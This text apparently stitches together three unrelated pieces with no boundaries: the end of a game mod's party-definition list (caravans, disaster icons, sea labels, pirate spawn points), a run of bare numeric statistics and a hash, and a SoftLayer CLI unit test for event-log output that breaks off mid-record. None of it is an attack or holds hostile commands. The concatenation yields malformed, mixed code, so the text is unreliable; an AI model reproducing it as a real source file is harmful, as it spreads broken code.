("rand_quest_caravan_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("for_quest_villa", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("workshop_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("brothel_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("nakepit_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ply_hideout", " ", icon_house_exn|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_riot", " ", icon_disaster_riot|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_fire", " ", icon_disaster_fire|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_typhoon", " ", icon_disaster_typhoon|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_flood", " ", icon_disaster_flood|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_epidemic", " ", icon_disaster_blackdeath|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_earthquake", " ", icon_disaster_earthquake|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_tides", " ", icon_disaster_tides|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_town", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_volcano", " ", icon_disaster_volcano|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_malaria", " ", icon_disaster_malaria|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_town", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ply", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ply", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ply", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_1", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_1", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_1", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_2", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_2", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_2", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_3", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_3", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_3", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("markpoint_sea_mid1", " ", icon_text_sea_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (177.0, -165.0), [], 5.0),
("markpoint_sea_mid2", " ", icon_text_sea_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-26.0, -105.0), [], 355.0),
("markpoint_sea_oriental", " ", icon_text_sea_02|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1210.0, -146.0), [], 20.0),
("markpoint_sea_baltic", " ", icon_text_sea_03|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (24.0, -420.0), [], 40.0),
("markpoint_sea_north", " ", icon_text_sea_04|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (185.0, -408.0), [], 25.0),
("markpoint_sea_black", " ", icon_text_sea_05|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-141.0, -225.0), []),
("markpoint_sea_schina", " ", icon_text_sea_06|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.0, 95.0), []),
("markpoint_sea_caspi", " ", icon_text_sea_07|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-323.0, -207.0), []),
("markpoint_sea_adri", " ", icon_text_sea_08|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (54.0, -214.0), [], 330.0),
("markpoint_sea_red", " ", icon_text_sea_09|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-194.0, 49.0), [], 315.0),
("markpoint_sea_cari", " ", icon_text_sea_10|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (997.0, 95.0), []),
("markpoint_sea_aeg", " ", icon_text_sea_11|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-49.0, -151.0), [], 335.0),
("markpoint_sea_echina", " ", icon_text_sea_12|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1144.0, -63.0), [], 10.0),
("markpoint_sea_arab", " ", icon_text_sea_13|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-445.0, 89.0), []),
("markpoint_sea_pers", " ", icon_text_sea_14|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-335.0, -27.0), [], 330.0),
("markpoint_sea_anda", " ", icon_text_sea_15|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-815.0, 137.0), []),
("markpoint_sea_ioni", " ", icon_text_sea_16|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -153.0), []),
("markpoint_sea_bengal", " ", icon_text_sea_17|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-720.0, 94.0), []),
("markpoint_sea_lacca", " ", icon_text_sea_18|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-598.0, 176.0), [], 340.0),
("markpoint_sea_bohai", " ", icon_text_sea_19|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1081.0, -165.0), [], 15.0),
("markpoint_sea_yellow", " ", icon_text_sea_20|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1118.0, -125.0), [], 20.0),
("markpoint_sea_oho", " ", icon_text_sea_21|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1383.0, -389.0), []),
("markpoint_sea_java", " ", icon_text_sea_22|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-992.0, 291.0), [], 350.0),
("markpoint_sea_siam", " ", icon_text_sea_23|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-885.0, 149.0), [], 320.0),
("markpoint_sea_aral", " ", icon_text_sea_24|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-426.0, -246.0), []),
("markpoint_sea_albo", " ", icon_text_sea_25|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.0, -131.0), []),
("markpoint_sea_levan", " ", icon_text_sea_26|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-144.0, -103.0), [], 70.0),
("markpoint_sea_biscay", " ", icon_text_sea_27|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.0, -255.0), [], 25.0),
("markpoint_sea_norway", " ", icon_text_sea_28|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.0, -566.0), []),
("markpoint_sea_engc", " ", icon_text_sea_29|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (244.0, -322.0), [], 10.0),
("markpoint_sea_maxi", " ", icon_text_sea_30|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1213.0, -10.0), []),
("markpoint_sea_sagas", " ", icon_text_sea_31|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1040.0, -70.0), [], 5.0),
("markpoint_sea_tyr", " ", icon_text_sea_32|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.0, -179.0), [], 335.0),
("markpoint_sea_hud", " ", icon_text_sea_33|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1165.0, -482.0), []),
("markpoint_sea_carpen", " ", icon_text_sea_34|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.0, 376.0), []),
("markpoint_geo_gobi", " ", icon_text_geo_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-923.0, -212.0), []),
("markpoint_geo_xinjiang", " ", icon_text_geo_02|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-704.0, -184.0), []),
("markpoint_geo_balqash", " ", icon_text_geo_03|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-586.0, -268.0), [], 35.0),
("markpoint_geo_sahara", " ", icon_text_geo_04|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (132.0, -28.0), []),
("markpoint_geo_gibr", " ", icon_text_geo_05|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (288.0, -134.0), []),
("markpoint_geo_alps", " ", icon_text_geo_06|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (137.0, -260.0), [], 25.0),
("markpoint_geo_green", " ", icon_text_geo_07|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (735.0, -589.0), []),
("markpoint_geo_ice", " ", icon_text_geo_08|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (425.0, -592.0), []),
("markpoint_geo_aus", " ", icon_text_geo_09|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1214.0, 489.0), []),
("markpoint_geo_papu", " ", icon_text_geo_10|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1301.0, 287.0), []),
("markpoint_geo_himal", " ", icon_text_geo_11|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-716.0, -43.0), [], 355.0),
("markpoint_geo_pyre", " ", icon_text_geo_12|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (222.0, -215.0), [], 350.0),
("markpoint_geo_cauc", " ", icon_text_geo_13|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.0, -217.0), []),
("markpoint_geo_arades", " ", icon_text_geo_14|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-294.0, 32.0), []),
("markpoint_geo_vic", " ", icon_text_geo_15|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.0, 252.0), []),
("markpoint_geo_mada", " ", icon_text_geo_16|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-278.0, 433.0), []),
("markpoint_geo_amaz", " ", icon_text_geo_17|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (888.0, 275.0), []),
("markpoint_geo_baikal", " ", icon_text_geo_18|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.0, -365.0), [], 40.0),
("pirate_spawn_point_01", "Calico Jack John Rackham", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-413.0, 100.0), []),
("pirate_spawn_point_02", "Conajee Angria", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-534.0, 95.0), []),
("pirate_spawn_point_03", "Black Sam Samuel Bellamy", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (884.0, 79.0), []),
("pirate_spawn_point_04", "Aziza Nurenahal", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-688.0, 105.0), []),
("pirate_spawn_point_05", "Koxinga", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1133.0, 6.0), []),
("pirate_spawn_point_06", "Shu Nian", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1116.0, -108.0), []),
("pirate_spawn_point_07", "Ching Shih", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1025.0, 61.0), []),
("pirate_spawn_point_08", "Murakami Yositada", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1172.0, -105.0), []),
("pirate_spawn_point_09", "Murakami Takeyosi", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1204.0, -137.0), []),
("pirate_spawn_point_10", "Alvilda", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -421.0), []),
("pirate_spawn_point_11", "Rollo", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (207.0, -446.0), []),
("pirate_spawn_point_12", "Ragnar Lodbrok", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (201.0, -396.0), []),
("pirate_spawn_point_13", "Francis Drake", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (314.0, -282.0), []),
("pirate_spawn_point_14", "Joao Ferrero", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (527.0, -158.0), []),
("pirate_spawn_point_15", "Catalina Errantzo", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (338.0, -120.0), []),
("pirate_spawn_point_16", "Murat", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-99.0, -108.0), []),
("pirate_spawn_point_17", "Uluj Ali", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (6.0, -119.0), []),
("pirate_spawn_point_18", "Aruj Reis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (86.0, -118.0), []),
("pirate_spawn_point_19", "Hayreddin Reis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (196.0, -159.0), []),
("pirate_spawn_point_20", "Edward England", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-260.0, 352.0), []),
("pirate_spawn_point_21", "Samuel Burgess", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (42.0, 619.0), []),
("pirate_spawn_point_22", "Thomas White", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (192.0, 221.0), []),
("pirate_spawn_point_23", "Edward Ned Low", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1057.0, -72.0), []),
("pirate_spawn_point_24", "John Hawkins", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (438.0, -34.0), []),
("pirate_spawn_point_25", "Jean Fleurie", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (840.0, 152.0), []),
("pirate_spawn_point_26", "Howell Davis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (475.0, 69.0), []),
("pirate_spawn_point_27", "Edward Teach Blackbeard", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1001.0, 90.0), []),
("pirate_spawn_point_28", "William Kidd", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (989.0, 18.0), []),
("pirate_spawn_point_29", "Bartholomew Roberts", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1082.0, 75.0), []),
("spawn_points_end", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_1", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_2", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_3", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_4", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_5", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
]
| 77.78224
| 195
| 0.718672
| 42,089
| 247,892
| 3.825893
| 0.054147
| 0.058834
| 0.078396
| 0.117594
| 0.800302
| 0.796526
| 0.79521
| 0.792769
| 0.792552
| 0.792552
| 0
| 0.096029
| 0.1001
| 247,892
| 3,187
| 196
| 77.78224
| 0.625817
| 0.00359
| 0
| 0.00126
| 0
| 0
| 0.104846
| 0.008113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003781
| 0
| 0.003781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a7ff0dcb1a8bee97960346443f3125425b77f3ad
| 14,496
|
py
|
Python
|
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | null | null | null |
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | 2
|
2019-02-18T18:35:51.000Z
|
2019-06-30T15:36:44.000Z
|
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | null | null | null |
"""
SoftLayer.tests.CLI.modules.event_log_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import json
from SoftLayer.CLI import formatting
from SoftLayer import testing
class EventLogTests(testing.TestCase):
def test_get_event_log_with_metadata(self):
expected = [
{
'date': '2017-10-23T14:22:36.221541-05:00',
'event': 'Disable Port',
'object': 'test.softlayer.com',
'username': 'SYSTEM',
'type': 'CCI',
'metadata': ''
},
{
'date': '2017-10-18T09:40:41.830338-05:00',
'event': 'Security Group Rule Added',
'object': 'test.softlayer.com',
'username': 'SL12345-test',
'type': 'CCI',
'metadata': json.dumps(json.loads(
'{"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"53d0b91d392864e062f4958",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"100"}],"securityGroupId":"200",'
'"securityGroupName":"test_SG"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T09:40:32.238869-05:00',
'event': 'Security Group Added',
'object': 'test.softlayer.com',
'username': 'SL12345-test',
'type': 'CCI',
'metadata': json.dumps(json.loads(
'{"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"96c9b47b9e102d2e1d81fba",'
'"securityGroupId":"200",'
'"securityGroupName":"test_SG"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:42:13.089536-05:00',
'event': 'Security Group Rule(s) Removed',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"requestId":"2abda7ca97e5a1444cae0b9",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:42:11.679736-05:00',
'event': 'Network Component Removed from Security Group',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"fullyQualifiedDomainName":"test.softlayer.com",'
'"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"6b9a87a9ab8ac9a22e87a00"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:41:49.802498-05:00',
'event': 'Security Group Rule(s) Added',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"requestId":"0a293c1c3e59e4471da6495",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:41:42.176328-05:00',
'event': 'Network Component Added to Security Group',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"fullyQualifiedDomainName":"test.softlayer.com",'
'"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"4709e02ad42c83f80345904"}'
),
indent=4,
sort_keys=True
)
}
]
result = self.run_command(['event-log', 'get', '--metadata'])
self.assert_no_fail(result)
self.assertEqual(expected, json.loads(result.output))
def test_get_event_log_without_metadata(self):
expected = [
{
'date': '2017-10-23T14:22:36.221541-05:00',
'event': 'Disable Port',
'username': 'SYSTEM',
'type': 'CCI',
'object': 'test.softlayer.com'
},
{
'date': '2017-10-18T09:40:41.830338-05:00',
'event': 'Security Group Rule Added',
'username': 'SL12345-test',
'type': 'CCI',
'object': 'test.softlayer.com'
},
{
'date': '2017-10-18T09:40:32.238869-05:00',
'event': 'Security Group Added',
'username': 'SL12345-test',
'type': 'CCI',
'object': 'test.softlayer.com'
},
{
'date': '2017-10-18T10:42:13.089536-05:00',
'event': 'Security Group Rule(s) Removed',
'username': 'SL12345-test',
'type': 'Security Group',
'object': 'test_SG'
},
{
'date': '2017-10-18T10:42:11.679736-05:00',
'event': 'Network Component Removed from Security Group',
'username': 'SL12345-test',
'type': 'Security Group',
'object': 'test_SG'
},
{
'date': '2017-10-18T10:41:49.802498-05:00',
'event': 'Security Group Rule(s) Added',
'username': 'SL12345-test',
'type': 'Security Group',
'object': 'test_SG'
},
{
'date': '2017-10-18T10:41:42.176328-05:00',
'event': 'Network Component Added to Security Group',
'username': 'SL12345-test',
'type': 'Security Group',
'object': 'test_SG'
}
]
result = self.run_command(['event-log', 'get'])
self.assert_no_fail(result)
self.assertEqual(expected, json.loads(result.output))
def test_get_event_table(self):
table_fix = formatting.Table(['event', 'object', 'type', 'date', 'username', 'metadata'])
table_fix.align['metadata'] = "l"
expected = [
{
'date': '2017-10-23T14:22:36.221541-05:00',
'event': 'Disable Port',
'object': 'test.softlayer.com',
'username': 'SYSTEM',
'type': 'CCI',
'metadata': ''
},
{
'date': '2017-10-18T09:40:41.830338-05:00',
